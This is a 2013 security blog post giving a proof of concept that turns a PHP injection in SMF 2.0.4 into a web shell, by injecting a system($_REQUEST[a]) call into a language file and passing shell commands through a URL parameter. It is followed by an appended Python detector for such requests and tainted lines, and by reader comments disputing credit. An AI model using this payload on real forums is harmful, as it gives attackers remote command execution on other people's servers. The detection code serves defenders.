Thursday 1 August 2013

[EN] SMF 2.0.4 PHP Injection - part 2

During the last few weeks a lot of you asked me how to add a shell via this PHP injection
vulnerability.

I decided to publish another PoC to show you how it can be done (but I believe
that few of you can code better PHP ideas than me ;) )

Anyway, as described here and here, try to add, as the 'poc-php-code', a line
like this one:

---< code >---
 en_US\';system($_REQUEST[a]);//
---< code >---

The next step is to go directly to your (changed) file and add an 'a' parameter with
a value equal to a Bash command :)

Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27

Now it will be possible to create a working web-shell.

Let me know via email or comments again if you have other ideas how this attack can be extended. ;)

Cheers!

o/
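
For defenders, the two traces this PoC leaves (a direct, parameterised request for a language file, and a language file that passes request input to an execution call) can be checked as below. This is an added example, not code from the original post or from SMF; the function names, the sample log lines and the sample language file are constructed, and the exact escaping SMF writes to disk is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote

# SMF include()s its language files; a direct HTTP request for one that also
# carries a query string is abnormal and matches the access pattern in the post.
LANG_PATH = re.compile(r"/Themes/[^/]+/languages/[^/]+\.php$", re.I)
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A command/code execution call whose argument contains a request superglobal.
SINK = re.compile(
    r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval|assert)\s*\("
    r"[^)]*\$_(?:REQUEST|GET|POST|COOKIE)", re.I)

def suspicious_requests(log_lines):
    """Return (path, decoded query, status) for parameterised hits on language files."""
    hits = []
    for line in log_lines:
        m = REQ.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if LANG_PATH.search(url.path) and url.query:
            hits.append((url.path, unquote(url.query), int(m.group(2))))
    return hits

def tainted_lines(php_source):
    """Return (line number, text) for lines that pass request input to an execution call."""
    return [(n, text.strip())
            for n, text in enumerate(php_source.splitlines(), 1)
            if SINK.search(text)]

# Constructed sample data (client address from the documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2013:10:00:00 +0000] "GET /smf2.0.4/index.php?action=admin HTTP/1.1" 200 9000',
    '203.0.113.7 - - [01/Aug/2013:10:01:00 +0000] "GET /smf2.0.4/Themes/default/languages/index.english.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Aug/2013:10:02:00 +0000] "GET /smf2.0.4/Themes/default/languages/index.english.php?a=ls%20-la HTTP/1.1" 200 512',
]
# Constructed language file; how SMF escapes the stored value is an assumption.
SAMPLE_LANG = r"""<?php
$txt['lang_character_set'] = 'ISO-8859-1';
$txt['lang_locale'] = 'en_US\\';system($_REQUEST[a]);//';
"""

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("log:", hit)
    for n, text in tainted_lines(SAMPLE_LANG):
        print(f"file line {n}: {text}")
```

A language file request without a query string is not flagged, so ordinary probes and crawlers stay out of the results.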

4 comments:

  1. you do realize that you need admin access to achieve this, also it's rather useless in the case that the languages directory is not writable, which will be a majority of cases

  2. and you do realize that this is poc?

  3. it doesn't matter if it's a poc, I've known about this since smf 2.0.1 was released, most of the bugs you have mentioned here were found by others, just like most of the submissions you have made to packetstorm are finds by other researchers that you have just attempted to credit yourself for

  4. ad 'it doesn't matter if it's a poc, (...) bugs you have mentioned here were found by others, just like most of the submissions you have made to packetstorm are finds by other researchers that you have just attempted to credit yourself for'


    yeah yeah. show me those findings. ;)
